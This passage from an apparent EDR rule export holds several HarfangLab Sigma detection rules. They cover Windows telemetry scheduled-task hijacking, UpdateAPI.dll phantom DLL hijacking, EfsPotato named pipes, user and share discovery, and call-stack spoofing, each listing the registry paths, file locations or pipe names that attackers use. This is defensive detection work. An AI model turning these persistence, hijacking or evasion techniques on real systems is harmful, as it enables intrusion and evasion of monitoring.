'/System/Library/CoreServices/ControlCenter.app/Contents/XPCServices/ControlCenterHelper.xpc/Contents/MacOS/ControlCenterHelper'\n - '/System/Library/ExtensionKit/Extensions/Sharing.appex/Contents/MacOS/Sharing'\n - '/usr/sbin/WirelessRadioManagerd'\n - '/usr/sbin/system_profiler'\n - '/usr/libexec/airportd'\n - '/usr/sbin/networksetup'\n - '/system/applications/utilities/airport utility.app/contents/macos/airport utility'\n - '/usr/bin/sysdiagnose'\n\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_fsecure:\n Image: '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n\n ### misc\n exclusion_vscode:\n Image: '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n\n exclusion_mac_screen_recorder:\n Image: '/applications/aiseesoft mac screen recorder.app/contents/macos/loader'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n exclusion_epson:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.epson.InstallNavi'\n\n exclusion_kobo:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.kobo.desktop.Kobo'\n\n exclusion_5kplayer:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.digiarty.5KPlayer'\n\n exclusion_snapgene:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.gslbiotech.snapgene'\n\n exclusion_webex:\n ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'Cisco-Systems.Spark'\n - 'Cisco-Systems.SparkHelper'\n\n exclusion_clickshare:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.barco.clickshare'\n\n exclusion_google_earth:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.Google.GoogleEarthPro'\n\n exclusion_skype:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.skype.skype.Helper-(Renderer)'\n\n exclusion_remoteservice:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.preference.network.remoteservice'\n\n exclusion_bluetooth:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.bluetoothd'\n\n exclusion_fixppo:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'MF.iMyFone Fixppo'\n\n exclusion_macfonelab:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.aiseesoft.mac-fonelab'\n\n exclusion_fonepaw:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.fonepaw.fonepaw-iphone-data-recovery'\n\n exclusion_fonetrans:\n - ProcessImage: '/Users/*/Mac FoneTrans.app/Contents/MacOS/CountStatistics'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.aiseesoft.mac-fonetrans'\n\n exclusion_aiseesoft:\n ProcessImage: '/Users/*/Aiseesoft iPhone Unlocker for Mac.app/Contents/MacOS/Loader'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.trolltech.qt.demo'\n\n exclusion_canon:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'jp.co.canon.MSU.app.Installer'\n\n exclusion_app_folder:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n\n exclusion_image:\n ProcessImage:\n - '/usr/bin/ditto'\n - '/sbin/md5'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b05fdca4-d28a-48e3-aeaa-0003e6db65f8",
"rule_name": "Suspicious Read Access to Airport Preferences",
"rule_description": "Detects a process reading sensitive files related to the Wi-Fi configuration.\nAdversaries may read these files in order to gather information about the internet connection.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b06cadad-e5ef-4e7d-9b96-5edc93279559",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089798Z",
"creation_date": "2026-03-23T11:45:34.089800Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089805Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_registry_persistence_telemetry_hijack.yml",
"content": "title: Microsoft Compatibility Appraiser Scheduled Task Hijack\nid: b06cadad-e5ef-4e7d-9b96-5edc93279559\ndescription: |\n Detects the hijacking of the Microsoft Compatibility Appraiser scheduled task (aka Windows Telemetry) with a custom command which will be launched once a day.\n This requires administrators privileges as a new entry in HKLM registry hive needs to be set.\n The new command is launched as a child process of CompatTelRunner.exe.\n It is recommended to investigate the concerned Scheduled Task as well as any spawned processes to determine if they are legitimate.\nreferences:\n - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2020/09/29\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\\\*\\Command'\n\n exclusion_details:\n Details|endswith:\n - '\\system32\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun' # Appraiser\n - '\\system32\\CompatTelRunner.exe -m:appraiser.dll -f:UpdateAvStatus' # AvStatus\n - '\\system32\\CompatTelRunner.exe -m:devinv.dll -f:CreateDeviceInventory' # DevInv\n - '\\system32\\CompatTelRunner.exe -m:invagent.dll -f:RunUpdate' # InvAgent\n - '\\system32\\CompatTelRunner.exe -m:generaltel.dll -f:DoCensusRun'\n - '\\system32\\CompatTelRunner.exe -m:pcasvc.dll -f:QueryEncapsulationSettings'\n - 'BackupMareData'\n - '(Empty)' # Ignore empty (possibly delete)\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b06cadad-e5ef-4e7d-9b96-5edc93279559",
"rule_name": "Microsoft Compatibility Appraiser Scheduled Task Hijack",
"rule_description": "Detects the hijacking of the Microsoft Compatibility Appraiser scheduled task (aka Windows Telemetry) with a custom command which will be launched once a day.\nThis requires administrators privileges as a new entry in HKLM registry hive needs to be set.\nThe new command is launched as a child process of CompatTelRunner.exe.\nIt is recommended to investigate the concerned Scheduled Task as well as any spawned processes to determine if they are legitimate.\n",
"rule_creation_date": "2020-09-29",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b0b0c15c-93de-4ac0-9940-ec34b680020f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088730Z",
"creation_date": "2026-03-23T11:45:34.088732Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088737Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2024/09/05/technical-debt-of-cwindowssystem-path/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_updateapi.yml",
"content": "title: UpdateAPI.dll Phantom DLL Hijacking\nid: b0b0c15c-93de-4ac0-9940-ec34b680020f\ndescription: |\n Detects the non-existing UpdateAPI.dll file loaded from Windows Folder.\n Adversaries may execute their own malicious payloads by planting a DLL in \"C:\\windows\" path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.hexacorn.com/blog/2024/09/05/technical-debt-of-cwindowssystem-path/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/09/10\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded:\n - '?:\\Windows\\UpdateAPI.dll'\n - '?:\\Windows\\system\\UpdateAPI.dll'\n - '?:\\Windows\\system32\\UpdateAPI.dll'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b0b0c15c-93de-4ac0-9940-ec34b680020f",
"rule_name": "UpdateAPI.dll Phantom DLL Hijacking",
"rule_description": "Detects the non-existing UpdateAPI.dll file loaded from Windows Folder.\nAdversaries may execute their own malicious payloads by planting a DLL in \"C:\\windows\" path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-09-10",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b0b2818b-2803-4a79-b1f2-7a0f323fc955",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622570Z",
"creation_date": "2026-03-23T11:45:34.622572Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622576Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_query_user.yml",
"content": "title: Local User List Discovered via query.exe\nid: b0b2818b-2803-4a79-b1f2-7a0f323fc955\ndescription: |\n Detects the execution of \"query user\" to discover the list of local users.\n Attackers may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system.\n It is recommended to analyze the parent and grandparent processes and their respective child processes to look for malicious content or actions.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\ndate: 2021/05/17\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\query.exe'\n # Renamed binaries\n - OriginalFileName: 'query.exe'\n selection_cmd:\n CommandLine|contains: 'user'\n\n exclusion_programfiles:\n GrandparentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_amazon:\n ParentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains|all:\n - '-NonInteractive'\n - '-ExecutionPolicy AllSigned'\n - '?:\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\'\n\n exclusion_sharepoint:\n ParentCommandLine|contains: '?:\\Program Files\\windowspowershell\\modules\\sharepointserver\\sharepoint.ps1'\n\n exclusion_nuance:\n ProcessParentOriginalFileName: 'SoD.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Nuance Communications Inc.'\n\n exclusion_xgate:\n ProcessGrandparentImage|endswith: '\\xGate.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature:\n - 'Axeda Corporation'\n - 'PTC Inc.'\n\n exclusion_forescout:\n - ProcessParentCommandLine:\n - 'cscript //U //nologo ?:\\Windows\\\\*\\fstmpsc\\fs_action_*_body.vbs *'\n - 'cscript //U //nologo ?:\\Windows\\\\*\\fstmp\\fs_action_*_body.vbs *'\n - 'cscript //U //nologo ?:\\Windows\\\\*\\forescout\\fs_action_*_body.vbs *'\n - ProcessAncestors|contains: '|?:\\Program Files\\ForeScout SecureConnector\\SecureConnector.exe|'\n\n exclusion_medical_dragon:\n ProcessParentImage|endswith: '\\Nuance\\Dragon Medical One\\sod.exe'\n\n exclusion_grandparent:\n ProcessGrandparentImage:\n - '?:\\Windows\\Prey\\versions\\\\*\\bin\\node.exe'\n - '?:\\ProgramData\\NinjaRMMAgent\\components\\app-patching-orbit\\NinjaOrbit.exe'\n - '?:\\Windows\\System32\\WUDFHost.exe'\n\n exclusion_generic_parentcommandline:\n ProcessParentCommandLine:\n - '*powershell.exe *-f* ?:\\Scripts\\\\*.ps1'\n - '*powershell.exe \\\\\\\\*.ps1'\n - '*powershell.exe *?:\\ProgramData\\\\*.ps1'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b0b2818b-2803-4a79-b1f2-7a0f323fc955",
"rule_name": "Local User List Discovered via query.exe",
"rule_description": "Detects the execution of \"query user\" to discover the list of local users.\nAttackers may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system.\nIt is recommended to analyze the parent and grandparent processes and their respective child processes to look for malicious content or actions.\n",
"rule_creation_date": "2021-05-17",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b0fcc9c7-a08a-4ab6-bc1f-d71cb1f63179",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610214Z",
"creation_date": "2026-03-23T11:45:34.610217Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610225Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/zcgonvh/EfsPotato/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_efs_potato_named_pipe.yml",
"content": "title: EfsPotato Named Pipe Created\nid: b0fcc9c7-a08a-4ab6-bc1f-d71cb1f63179\ndescription: |\n Detects the creation of a named pipe related to the EfsPotato privilege escalation tool.\n EFSPotato exploits the SeImpersonatePrivilege usually held by services to elevate their privileges.\n It is recommended to investigate the process that created the named pipe and its potential child processes, as well as processes that connected to the named pipe.\nreferences:\n - https://github.com/zcgonvh/EfsPotato/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2024/02/01\nmodified: 2025/02/10\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.NamedPipe\n - classification.Windows.HackTool.EfsPotato\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName|endswith: '\\\\????????-????-????-????-????????????\\pipe\\srvsvc'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b0fcc9c7-a08a-4ab6-bc1f-d71cb1f63179",
"rule_name": "EfsPotato Named Pipe Created",
"rule_description": "Detects the creation of a named pipe related to the EfsPotato privilege escalation tool.\nEFSPotato exploits the SeImpersonatePrivilege usually held by services to elevate their privileges.\nIt is recommended to investigate the process that created the named pipe and its potential child processes, as well as processes that connected to the named pipe.\n",
"rule_creation_date": "2024-02-01",
"rule_modified_date": "2025-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b12c49d5-235d-4f76-978f-983e26a93de7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083480Z",
"creation_date": "2026-03-23T11:45:34.083482Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083486Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2020/04/30/tricky-pyxie/",
"https://attack.mitre.org/techniques/T1135/"
],
"name": "t1135_net_share.yml",
"content": "title: Local SMB Shares Enumerated via net.exe\nid: b12c49d5-235d-4f76-978f-983e26a93de7\ndescription: |\n Detects the execution of 'net1.exe' with 'share' argument.\n Adversaries can use 'net share' during the discovery phase to query shared drives on the local system.\n It is recommended to investigate the parent process for suspicious activities.\n If this activity is recurrent in your environment, it is highly recommended to whitelist the software or scripts responsible for this action.\nreferences:\n - https://thedfirreport.com/2020/04/30/tricky-pyxie/\n - https://attack.mitre.org/techniques/T1135/\ndate: 2022/11/14\nmodified: 2025/05/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1135\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_commandline:\n CommandLine|contains: ' share'\n GrandparentImage|startswith: '?:\\'\n\n filter_net:\n CommandLine|startswith:\n - '?:\\Windows\\system32\\net1 start '\n - '?:\\Windows\\system32\\net1 stop '\n - '?:\\WINDOWS\\system32\\net1 use '\n\n exclusion_programfiles:\n GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_gathernetwork:\n GrandparentCommandLine: '?:\\Windows\\System32\\cmd.exe /c net share >> config\\FileSharing.txt'\n\n exclusion_ipam:\n - CommandLine|startswith: '?:\\Windows\\system32\\net1 share dhcpaudit=?:\\Windows\\system32\\dhcp /grant:IPAMUG@'\n - GrandparentCommandLine|contains: '\\Machine\\Scripts\\Startup\\ipamprovisioning.ps1 DHCP IPAMUG'\n\n exclusion_connectwise:\n GrandparentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n\n exclusion_services:\n Ancestors|endswith: '|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_berger-levrault:\n CommandLine: '?:\\Windows\\system32\\net1 share editions$=?:\\Berger-Levrault\\SM\\editions'\n\n exclusion_centrastage:\n GrandparentCommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\ProgramData\\CentraStage\\Packages\\\\*#\\command.bat'\n\n exclusion_septeo:\n ProcessGrandparentImage|endswith: '\\eSeasonLiveUpdateServeurService.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'SAS SEPTEO HOSPITALITY SOLUTIONS'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b12c49d5-235d-4f76-978f-983e26a93de7",
"rule_name": "Local SMB Shares Enumerated via net.exe",
"rule_description": "Detects the execution of 'net1.exe' with 'share' argument.\nAdversaries can use 'net share' during the discovery phase to query shared drives on the local system.\nIt is recommended to investigate the parent process for suspicious activities.\nIf this activity is recurrent in your environment, it is highly recommended to whitelist the software or scripts responsible for this action.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-05-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1135"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b13d158e-75df-4ac8-9c77-d0b173c027f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071233Z",
"creation_date": "2026-03-23T11:45:34.071235Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071239Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.reliaquest.com/blog/double-extortion-attack-analysis/",
"https://securelist.com/toddycat-keep-calm-and-check-logs/110696/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_dll_load_from_debug_folder.yml",
"content": "title: DLL Loaded from Debug Folder\nid: b13d158e-75df-4ac8-9c77-d0b173c027f1\ndescription: |\n Detects the suspicious loading of a DLL from the \"\\Windows\\Debug\" folder.\n This is an uncommon directory for DLLs, often exploited by attackers for malicious purposes.\n It is recommended to analyze the loaded DLL for malicious content, check file integrity, and review process behavior to identify potential threats.\nreferences:\n - https://www.reliaquest.com/blog/double-extortion-attack-analysis/\n - https://securelist.com/toddycat-keep-calm-and-check-logs/110696/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2023/12/22\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:\\windows\\debug\\'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b13d158e-75df-4ac8-9c77-d0b173c027f1",
"rule_name": "DLL Loaded from Debug Folder",
"rule_description": "Detects the suspicious loading of a DLL from the \"\\Windows\\Debug\" folder.\nThis is an uncommon directory for DLLs, often exploited by attackers for malicious purposes.\nIt is recommended to analyze the loaded DLL for malicious content, check file integrity, and review process behavior to identify potential threats.\n",
"rule_creation_date": "2023-12-22",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b144a6e6-ed47-40a0-a45b-6a1928f2c29d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070065Z",
"creation_date": "2026-03-23T11:45:34.070067Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070072Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_rem_thr_callstack_spoofing_related_to_vulcan_raven.yml",
"content": "title: Spoofed Thread Call Stack Related to VulcanRaven\nid: b144a6e6-ed47-40a0-a45b-6a1928f2c29d\ndescription: |\n Detects arbitrary call stacks related to the VulcanRaven PoC.\n VulcanRaven employs call stack spoofing techniques to evade detection by EDR solutions, it manipulates thread call stacks to appear as legitimate Windows system operations, making malicious activities blend in with normal system behavior.\n Attackers may try to bypass EDR behavioral detection by forging call stacks that mimic trusted system processes and libraries, thereby evading stack-based heuristics and memory analysis.\n It is recommended to investigate the source process, validate the legitimacy of the call chain, examine memory for inconsistencies, and correlate with other suspicious activities from the same process or parent process.\nreferences:\n - https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/08/25\nmodified: 2025/11/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055.001\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection_wmi_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'CorperfmonExt.dll'\n 